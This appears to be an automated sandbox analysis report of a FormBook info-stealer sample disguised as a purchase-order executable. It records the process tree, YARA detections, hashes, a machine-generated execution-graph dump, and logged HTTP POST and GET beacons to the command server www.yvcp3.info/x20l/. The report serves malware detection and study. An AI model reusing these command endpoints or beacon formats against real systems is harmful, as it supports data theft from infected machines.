                                                                  Data Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 50 77 34 53 67 43 54 52 62 47 72 32 5a 70 50 72 71 30 6e 53 4b 74 45 55 55 41 46 6d 6e 42 38 66 38 49 45 4e 34 75 30 72 34 7a 4a 76 66 57 76 66 45 35 6c 55 58 4d 49 57 32 74 32 63 43 6f 46 76 67 58 55 58 51 77 6d 6f 52 69 6a 4a 35 30 2d 42 32 55 4b 30 57 41 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f [TRUNCATED]
                                                                  Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="Pw4SgCTRbGr2ZpPrq0nSKtEUUAFmnB8f8IEN4u0r4zJvfWvfE5lUXMIW2t2cCoFvgXUXQwmoRijJ50-B2UK0WA=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></div></bod
                                                                  Dec 4, 2024 12:52:56.964917898 CET | 18 | IN | Data Raw: 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: y></html>0


                                                                  Session ID: 47 | Source IP: 192.168.2.4 | Source Port: 50051 | Destination IP: 47.254.140.255 | Destination Port: 80 | PID: 4348 | Process: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 4, 2024 12:52:58.330331087 CET | 10847 | OUT | POST /x20l/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.yvcp3.info
                                                                  Origin: http://www.yvcp3.info
                                                                  Referer: http://www.yvcp3.info/x20l/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 10304
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 53 73 6e 51 47 53 6f 79 46 54 72 74 70 56 2b 46 7a 6f 56 53 75 6c 46 46 46 2b 78 63 62 57 65 74 54 69 4c 61 41 65 7a 41 2f 50 45 6a 46 31 66 41 58 5a 73 33 38 76 6c 74 55 7a 4a 41 62 69 34 73 52 62 51 71 47 79 65 41 4f 59 58 56 72 35 6e 47 41 41 64 48 4f 4a 2b 58 32 67 55 41 5a 33 79 6c 46 33 66 34 42 63 45 36 6c 38 4d 33 61 61 30 43 56 64 36 44 75 52 65 6b 57 31 37 4d 6e 65 35 48 46 61 76 61 63 6b 30 78 30 47 4c 5a 41 6e 6f 2b 6e 4a 4d 6b 75 33 6e 6a 5a 34 46 74 77 4b 62 41 41 6a 42 75 6e 75 32 78 42 6f 78 6b 72 44 5a 52 70 5a 59 36 53 30 69 48 62 6d 73 43 33 6b 69 61 5a 34 5a 64 4a 64 4e 6d 68 54 6f 31 43 6a 73 71 61 4f 72 79 47 43 38 35 4d 47 53 59 61 51 6d 4c 6d 52 79 76 7a 41 6e 43 57 43 72 2f 73 6a 6d 67 56 77 58 66 52 61 54 36 65 39 33 75 75 48 2f 63 69 2f 4c 59 69 45 37 39 56 48 78 43 38 6f 55 75 66 66 47 6c 33 4a 50 7a 69 34 54 45 6c 41 33 68 56 6b 35 65 31 66 71 46 73 49 66 6e 59 30 34 42 39 75 79 58 51 32 70 6f 6d 41 5a 31 38 4e 62 71 7a 79 49 55 66 4e 6b 56 51 4a [TRUNCATED]
                                                                  Data Ascii: BTPDLZX=[TRUNCATED]
                                                                  Dec 4, 2024 12:52:59.712037086 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx/1.20.1
                                                                  Date: Wed, 04 Dec 2024 11:52:59 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  X-Trace: 2BA4C03F7875C9836252DFDE6662D24BE023FEE08804809F4381DB25F600
                                                                  Set-Cookie: _csrf=2600c4fa145ba9ab5add2e1932fb36cd832c7bb4977c3ecb8ef4685c0e838d2ea%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22zhSowqriAwHpcx3LY_9g4XddHQU74CEX%22%3B%7D; path=/; HttpOnly
                                                                  Data Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 7a 6c 30 78 2d 41 68 7a 43 61 2d 43 32 44 49 39 73 74 39 64 4a 71 43 59 6f 58 5a 5f 6a 31 77 53 66 37 73 72 50 44 44 32 58 33 6d 30 4e 57 4b 58 66 77 4a 37 78 73 4f 76 65 6b 33 52 70 32 35 71 2d 63 65 59 45 55 76 58 4f 48 59 33 36 6e 34 4c 42 4c 55 61 49 51 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f [TRUNCATED]
                                                                  Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="zl0x-AhzCa-C2DI9st9dJqCYoXZ_j1wSf7srPDD2X3m0NWKXfwJ7xsOvek3Rp25q-ceYEUvXOHY36n4LBLUaIQ=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></div></bod
                                                                  Dec 4, 2024 12:52:59.712075949 CET | 18 | IN | Data Raw: 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: y></html>0


                                                                  Session ID: 48 | Source IP: 192.168.2.4 | Source Port: 50052 | Destination IP: 47.254.140.255 | Destination Port: 80 | PID: 4348 | Process: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 4, 2024 12:53:01.134576082 CET | 481 | OUT | GET /x20l/?BTPDLZX=fuPwFllnLQvzi1y5p/ZpnhRgNM4mXlCpPG7RIdaZj/0kEynSdOAf8+xad2xabD02Zo5QEVuMD42Ooe6vMAhBaOmt5mAtHSKuJTa6Be4mvNoGTYEsb86Lrhw=&WnQdf=JhLPW HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US
                                                                  Host: www.yvcp3.info
                                                                  Connection: close
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Dec 4, 2024 12:53:02.437973022 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx/1.20.1
                                                                  Date: Wed, 04 Dec 2024 11:53:02 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  X-Trace: 2B6EF7CE246D813F2A67B6634ECF40471C09CEBEF703DFB544C06E69DC00
                                                                  Set-Cookie: _csrf=747b8697c02316fcf19e7214b88d47110cd215a6080696d3778b8b37088faef7a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22-jrt7cPQ7j7vxss_Mw9RmJa8woAWmtNT%22%3B%7D; path=/; HttpOnly
                                                                  Data Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 35 6f 49 52 34 4d 47 61 73 61 4b 77 30 65 72 71 71 4c 4d 50 6b 37 6a 78 62 6f 53 73 39 64 65 56 48 6d 32 79 6e 35 6c 77 68 34 47 38 48 6f 7a 74 47 55 36 6c 37 32 70 63 4e 33 53 30 62 39 68 41 35 54 38 36 48 5f 35 74 6d 59 6a 46 76 65 64 45 78 47 4d 53 67 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f [TRUNCATED]
                                                                  Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="K5oIR4MGasaKw0erqqLMPk7jxboSs9deVHm2yn5lwh4G8HoztGU6l72pcN3S0b9hA5T86H_5tmYjFvedExGMSg=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></div></bod
                                                                  Dec 4, 2024 12:53:02.438080072 CET | 18 | IN | Data Raw: 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: y></html>0



                                                                  Target ID:0
                                                                  Start time:06:48:54
                                                                  Start date:04/12/2024
                                                                  Path:C:\Users\user\Desktop\PO 4110007694.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\PO 4110007694.exe"
                                                                  Imagebase:0xc10000
                                                                  File size:1'212'928 bytes
                                                                  MD5 hash:125B9B9F3011E06FCB331140CE8BF01F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:1
                                                                  Start time:06:48:55
                                                                  Start date:04/12/2024
                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\PO 4110007694.exe"
                                                                  Imagebase:0x5f0000
                                                                  File size:46'504 bytes
                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1895662906.0000000006D00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1883944233.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1885773704.0000000004DE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:2
                                                                  Start time:06:49:10
                                                                  Start date:04/12/2024
                                                                  Path:C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe"
                                                                  Imagebase:0xa00000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4114931150.0000000004180000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:4
                                                                  Start time:06:49:13
                                                                  Start date:04/12/2024
                                                                  Path:C:\Windows\SysWOW64\bitsadmin.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\SysWOW64\bitsadmin.exe"
                                                                  Imagebase:0xa30000
                                                                  File size:186'880 bytes
                                                                  MD5 hash:F57A03FA0E654B393BB078D1C60695F3
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4114791942.0000000003280000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4113656138.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4114738212.0000000003230000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:moderate
                                                                  Has exited:false

                                                                  Target ID:7
                                                                  Start time:06:49:25
                                                                  Start date:04/12/2024
                                                                  Path:C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe"
                                                                  Imagebase:0xa00000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4117111147.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:8
                                                                  Start time:06:49:37
                                                                  Start date:04/12/2024
                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                  Imagebase:0x7ff6bf500000
                                                                  File size:676'768 bytes
                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                    Execution Graph

                                                                    Execution Coverage:3.2%
                                                                    Dynamic/Decrypted Code Coverage:1.3%
                                                                    Signature Coverage:8.5%
                                                                    Total number of Nodes:2000
                                                                    Total number of Limit Nodes:147
Mailbox 59 API calls 104256->104258 104257 c30db6 Mailbox 59 API calls 104259 c13fb8 104257->104259 104258->104260 104259->104143 104260->104257 104310 c14c03 104261->104310 104264 c14bdc 104266 c14bf5 104264->104266 104267 c14bec FreeLibrary 104264->104267 104265 c14c03 2 API calls 104265->104264 104268 c3525b 104266->104268 104267->104266 104314 c35270 104268->104314 104270 c14dfc 104270->104149 104270->104150 104474 c14c36 104271->104474 104274 c14ba1 FreeLibrary 104275 c14baa 104274->104275 104278 c14c70 104275->104278 104276 c14c36 2 API calls 104277 c14b8f 104276->104277 104277->104274 104277->104275 104279 c30db6 Mailbox 59 API calls 104278->104279 104280 c14c85 104279->104280 104478 c1522e 104280->104478 104282 c14c91 _memmove 104283 c14ccc 104282->104283 104284 c14dc1 104282->104284 104285 c14d89 104282->104285 104286 c14ec7 69 API calls 104283->104286 104492 c7991b 95 API calls 104284->104492 104481 c14e89 CreateStreamOnHGlobal 104285->104481 104292 c14cd5 104286->104292 104289 c14f0b 74 API calls 104289->104292 104290 c14d69 104290->104157 104292->104289 104292->104290 104293 c4d8a7 104292->104293 104487 c14ee5 104292->104487 104294 c14ee5 85 API calls 104293->104294 104295 c4d8bb 104294->104295 104296 c14f0b 74 API calls 104295->104296 104296->104290 104298 c4d9cd 104297->104298 104299 c14f1d 104297->104299 104516 c355e2 104299->104516 104302 c79109 104536 c78f5f 104302->104536 104304 c7911f 104304->104165 104306 c4d990 104305->104306 104307 c14ed6 104305->104307 104541 c35c60 104307->104541 104309 c14ede 104309->104167 104311 c14bd0 104310->104311 104312 c14c0c LoadLibraryA 104310->104312 104311->104264 104311->104265 104312->104311 104313 c14c1d GetProcAddress 104312->104313 104313->104311 104317 c3527c __setmbcp 104314->104317 104315 c3528f 104363 c38b28 58 API calls __getptd_noexit 104315->104363 104317->104315 104319 c352c0 104317->104319 104318 c35294 104364 c38db6 9 API calls __wopenfile 104318->104364 104333 c404e8 104319->104333 104322 c352c5 
104323 c352db 104322->104323 104324 c352ce 104322->104324 104326 c35305 104323->104326 104327 c352e5 104323->104327 104365 c38b28 58 API calls __getptd_noexit 104324->104365 104348 c40607 104326->104348 104366 c38b28 58 API calls __getptd_noexit 104327->104366 104328 c3529f @_EH4_CallFilterFunc@8 __setmbcp 104328->104270 104334 c404f4 __setmbcp 104333->104334 104335 c39c0b __lock 58 API calls 104334->104335 104341 c40502 104335->104341 104336 c4057d 104373 c3881d 58 API calls __malloc_crt 104336->104373 104339 c40584 104346 c40576 104339->104346 104374 c39e2b InitializeCriticalSectionAndSpinCount 104339->104374 104340 c405f3 __setmbcp 104340->104322 104341->104336 104343 c39c93 __mtinitlocknum 58 API calls 104341->104343 104341->104346 104371 c36c50 59 API calls __lock 104341->104371 104372 c36cba LeaveCriticalSection LeaveCriticalSection _doexit 104341->104372 104343->104341 104345 c405aa EnterCriticalSection 104345->104346 104368 c405fe 104346->104368 104349 c40627 __wopenfile 104348->104349 104350 c40641 104349->104350 104362 c407fc 104349->104362 104381 c337cb 60 API calls 2 library calls 104349->104381 104379 c38b28 58 API calls __getptd_noexit 104350->104379 104352 c40646 104380 c38db6 9 API calls __wopenfile 104352->104380 104354 c4085f 104376 c485a1 104354->104376 104356 c35310 104367 c35332 LeaveCriticalSection LeaveCriticalSection __wfsopen 104356->104367 104358 c407f5 104358->104362 104382 c337cb 60 API calls 2 library calls 104358->104382 104360 c40814 104360->104362 104383 c337cb 60 API calls 2 library calls 104360->104383 104362->104350 104362->104354 104363->104318 104364->104328 104365->104328 104366->104328 104367->104328 104375 c39d75 LeaveCriticalSection 104368->104375 104370 c40605 104370->104340 104371->104341 104372->104341 104373->104339 104374->104345 104375->104370 104384 c47d85 104376->104384 104378 c485ba 104378->104356 104379->104352 104380->104356 104381->104358 104382->104360 104383->104362 104386 c47d91 __setmbcp 104384->104386 104385 
c47da7 104471 c38b28 58 API calls __getptd_noexit 104385->104471 104386->104385 104389 c47ddd 104386->104389 104388 c47dac 104472 c38db6 9 API calls __wopenfile 104388->104472 104395 c47e4e 104389->104395 104392 c47df9 104473 c47e22 LeaveCriticalSection __unlock_fhandle 104392->104473 104394 c47db6 __setmbcp 104394->104378 104396 c47e6e 104395->104396 104397 c344ea __wsopen_nolock 58 API calls 104396->104397 104400 c47e8a 104397->104400 104398 c38dc6 __invoke_watson 8 API calls 104399 c485a0 104398->104399 104401 c47d85 __wsopen_helper 103 API calls 104399->104401 104402 c47ec4 104400->104402 104413 c47ee7 104400->104413 104418 c47fc1 104400->104418 104403 c485ba 104401->104403 104404 c38af4 __set_osfhnd 58 API calls 104402->104404 104403->104392 104405 c47ec9 104404->104405 104406 c38b28 __wopenfile 58 API calls 104405->104406 104407 c47ed6 104406->104407 104409 c38db6 __wopenfile 9 API calls 104407->104409 104408 c47fa5 104410 c38af4 __set_osfhnd 58 API calls 104408->104410 104411 c47ee0 104409->104411 104412 c47faa 104410->104412 104411->104392 104414 c38b28 __wopenfile 58 API calls 104412->104414 104413->104408 104417 c47f83 104413->104417 104415 c47fb7 104414->104415 104416 c38db6 __wopenfile 9 API calls 104415->104416 104416->104418 104419 c3d294 __alloc_osfhnd 61 API calls 104417->104419 104418->104398 104420 c48051 104419->104420 104421 c4807e 104420->104421 104422 c4805b 104420->104422 104423 c47cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 104421->104423 104424 c38af4 __set_osfhnd 58 API calls 104422->104424 104433 c480a0 104423->104433 104425 c48060 104424->104425 104427 c38b28 __wopenfile 58 API calls 104425->104427 104426 c4811e GetFileType 104428 c48129 GetLastError 104426->104428 104429 c4816b 104426->104429 104431 c4806a 104427->104431 104432 c38b07 __dosmaperr 58 API calls 104428->104432 104441 c3d52a __set_osfhnd 59 API calls 104429->104441 104430 c480ec GetLastError 104434 c38b07 __dosmaperr 58 API calls 104430->104434 104435 
c38b28 __wopenfile 58 API calls 104431->104435 104436 c48150 CloseHandle 104432->104436 104433->104426 104433->104430 104437 c47cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 104433->104437 104438 c48111 104434->104438 104435->104411 104436->104438 104439 c4815e 104436->104439 104440 c480e1 104437->104440 104443 c38b28 __wopenfile 58 API calls 104438->104443 104442 c38b28 __wopenfile 58 API calls 104439->104442 104440->104426 104440->104430 104446 c48189 104441->104446 104444 c48163 104442->104444 104443->104418 104444->104438 104445 c48344 104445->104418 104449 c48517 CloseHandle 104445->104449 104446->104445 104447 c418c1 __lseeki64_nolock 60 API calls 104446->104447 104463 c4820a 104446->104463 104448 c481f3 104447->104448 104452 c38af4 __set_osfhnd 58 API calls 104448->104452 104467 c48212 104448->104467 104450 c47cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 104449->104450 104451 c4853e 104450->104451 104454 c48546 GetLastError 104451->104454 104455 c483ce 104451->104455 104452->104463 104453 c40e5b 70 API calls __read_nolock 104453->104467 104456 c38b07 __dosmaperr 58 API calls 104454->104456 104455->104418 104457 c48552 104456->104457 104459 c3d43d __free_osfhnd 59 API calls 104457->104459 104458 c40add __close_nolock 61 API calls 104458->104467 104459->104455 104460 c497a2 __chsize_nolock 82 API calls 104460->104467 104461 c418c1 60 API calls __lseeki64_nolock 104461->104463 104462 c3d886 __write 78 API calls 104462->104463 104463->104445 104463->104461 104463->104462 104463->104467 104464 c483c1 104466 c40add __close_nolock 61 API calls 104464->104466 104465 c483aa 104465->104445 104469 c483c8 104466->104469 104467->104453 104467->104458 104467->104460 104467->104463 104467->104464 104467->104465 104468 c418c1 60 API calls __lseeki64_nolock 104467->104468 104468->104467 104470 c38b28 __wopenfile 58 API calls 104469->104470 104470->104455 104471->104388 104472->104394 104473->104394 104475 c14b83 104474->104475 104476 c14c3f 
LoadLibraryA 104474->104476 104475->104276 104475->104277 104476->104475 104477 c14c50 GetProcAddress 104476->104477 104477->104475 104479 c30db6 Mailbox 59 API calls 104478->104479 104480 c15240 104479->104480 104480->104282 104482 c14ec0 104481->104482 104483 c14ea3 FindResourceExW 104481->104483 104482->104283 104483->104482 104484 c4d933 LoadResource 104483->104484 104484->104482 104485 c4d948 SizeofResource 104484->104485 104485->104482 104486 c4d95c LockResource 104485->104486 104486->104482 104488 c14ef4 104487->104488 104489 c4d9ab 104487->104489 104493 c3584d 104488->104493 104491 c14f02 104491->104292 104492->104283 104494 c35859 __setmbcp 104493->104494 104495 c3586b 104494->104495 104497 c35891 104494->104497 104506 c38b28 58 API calls __getptd_noexit 104495->104506 104508 c36c11 104497->104508 104498 c35870 104507 c38db6 9 API calls __wopenfile 104498->104507 104501 c35897 104514 c357be 83 API calls 5 library calls 104501->104514 104503 c358a6 104515 c358c8 LeaveCriticalSection LeaveCriticalSection __wfsopen 104503->104515 104505 c3587b __setmbcp 104505->104491 104506->104498 104507->104505 104509 c36c43 EnterCriticalSection 104508->104509 104510 c36c21 104508->104510 104511 c36c39 104509->104511 104510->104509 104512 c36c29 104510->104512 104511->104501 104513 c39c0b __lock 58 API calls 104512->104513 104513->104511 104514->104503 104515->104505 104519 c355fd 104516->104519 104518 c14f2e 104518->104302 104520 c35609 __setmbcp 104519->104520 104521 c3564c 104520->104521 104523 c3561f _memset 104520->104523 104531 c35644 __setmbcp 104520->104531 104522 c36c11 __lock_file 59 API calls 104521->104522 104525 c35652 104522->104525 104532 c38b28 58 API calls __getptd_noexit 104523->104532 104534 c3541d 72 API calls 5 library calls 104525->104534 104526 c35639 104533 c38db6 9 API calls __wopenfile 104526->104533 104528 c35668 104535 c35686 LeaveCriticalSection LeaveCriticalSection __wfsopen 104528->104535 104531->104518 104532->104526 104533->104531 
104534->104528 104535->104531 104539 c3520a GetSystemTimeAsFileTime 104536->104539 104538 c78f6e 104538->104304 104540 c35238 __aulldiv 104539->104540 104540->104538 104542 c35c6c __setmbcp 104541->104542 104543 c35c93 104542->104543 104544 c35c7e 104542->104544 104546 c36c11 __lock_file 59 API calls 104543->104546 104555 c38b28 58 API calls __getptd_noexit 104544->104555 104548 c35c99 104546->104548 104547 c35c83 104556 c38db6 9 API calls __wopenfile 104547->104556 104557 c358d0 67 API calls 6 library calls 104548->104557 104551 c35ca4 104558 c35cc4 LeaveCriticalSection LeaveCriticalSection __wfsopen 104551->104558 104553 c35cb6 104554 c35c8e __setmbcp 104553->104554 104554->104309 104555->104547 104556->104554 104557->104551 104558->104553 104559->104172 104560->104187 104561->104189 104562->104186 104564 c30db6 Mailbox 59 API calls 104563->104564 104565 c19209 104564->104565 104565->104195 104567 c19169 Mailbox 104566->104567 104568 c4f19f 104567->104568 104573 c19173 104567->104573 104569 c30db6 Mailbox 59 API calls 104568->104569 104571 c4f1ab 104569->104571 104570 c1917a 104570->104199 104573->104570 104574 c19c90 59 API calls Mailbox 104573->104574 104574->104573 104575->104210 104576->104205 104581 c79748 __tzset_nolock _wcscmp 104577->104581 104578 c795dc 104578->104216 104578->104243 104579 c14f0b 74 API calls 104579->104581 104580 c79109 GetSystemTimeAsFileTime 104580->104581 104581->104578 104581->104579 104581->104580 104582 c14ee5 85 API calls 104581->104582 104582->104581 104584 c78b11 104583->104584 104585 c78b1f 104583->104585 104586 c3525b 115 API calls 104584->104586 104587 c78b64 104585->104587 104588 c3525b 115 API calls 104585->104588 104613 c78b28 104585->104613 